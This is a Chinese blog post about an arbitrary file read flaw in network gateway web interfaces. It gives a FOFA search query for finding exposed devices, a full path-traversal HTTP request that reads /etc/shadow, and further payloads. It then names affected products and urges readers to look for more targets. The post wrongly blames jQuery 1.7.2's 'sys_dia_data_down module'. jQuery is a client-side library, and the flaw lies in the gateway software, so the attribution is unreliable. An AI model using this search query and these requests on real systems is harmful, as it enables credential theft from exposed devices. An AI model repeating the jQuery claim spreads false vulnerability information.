jQuery-1.7.2存在任意文件读取漏洞

jQuery1.7.2版本的sys_dia_data_down模块存在高危任意文件读取漏洞,攻击者可通过构造特定请求读取服务器文件。许多依赖此版本的网关系统易受攻击,包括飞鱼星防火墙和任天行管理系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。

1.漏洞级别

高危

2.漏洞搜索

fofa

body="webui/js/jquerylib/jquery-1.7.2.min.js"

3.影响范围

jQuery-1.7.2

4.漏洞复现

我们以使用该插件的安博通网关为例:
构造

GET /webui/?file_name=../../../../../etc/shadow&g=sys_dia_data_down HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: USGSESSID=ddc4875e875c49403c35ccfbcef07db1
Upgrade-Insecure-Requests: 1

返回内容即为文件内容:
在这里插入图片描述不难看出file_name就是控制文件路径的参数,我们可以简单的得出访问任意文件的构造访问

file_name=../../../../../etc/shadow. =/etc/shadow
file_name=../../../../../bin/bash  =/bin/bash

漏洞相对比较简单。

5.后话

因为jquery是个非常常用的插件,所以很多饮用该版本的系统都会存在漏洞,大量的网关系统就因此中招了,已知的就有这些。

    如:
    飞鱼星下一代防火墙安全网关;/任天行网络安全管理系统;等等很多很多。有兴趣大家可以自己找找看。
 

后续还会随文章附赠一个简单的利用脚本,如果有问题欢迎随时沟通~
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值